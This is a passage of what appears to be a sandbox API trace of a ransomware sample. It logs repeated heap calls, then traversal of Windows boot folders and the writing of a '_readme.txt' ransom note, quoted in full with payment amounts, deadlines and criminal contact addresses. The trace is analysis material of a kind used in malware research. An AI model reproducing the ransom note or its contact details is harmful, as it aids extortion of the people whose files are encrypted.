hHeap=0x680000) returned 1 [0090.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.724] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.724] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.724] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.724] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.724] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.724] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.724] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.724] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.727] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.727] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.727] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.727] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.727] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.727] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.727] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.727] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.727] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.727] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.727] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.727] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.727] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.727] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.727] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.727] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.727] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.727] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.729] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.729] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.729] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.729] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.729] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.729] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.729] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.729] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.729] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.729] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.729] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.729] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.729] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.729] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.729] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.730] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.730] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.730] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.730] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.730] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.730] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.730] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.730] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.730] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.730] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.730] PathFindFileNameW (pszPath="C:\\Boot\\cs-CZ\\") returned="cs-CZ\\" [0090.730] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0090.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.730] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0090.730] PathFindFileNameW (pszPath="") returned="" [0090.730] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0090.731] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0090.731] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0090.731] FreeLibrary (hLibModule=0x75670000) returned 1 [0090.731] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.731] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0090.731] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.731] PathAppendW (in: pszPath="C:\\Boot\\cs-CZ\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0090.732] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.732] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.732] PathFileExistsW (pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 0 [0090.734] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7d00) returned 0x99f52d8 [0090.734] lstrcpyW (in: lpString1=0x99f52d8, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder 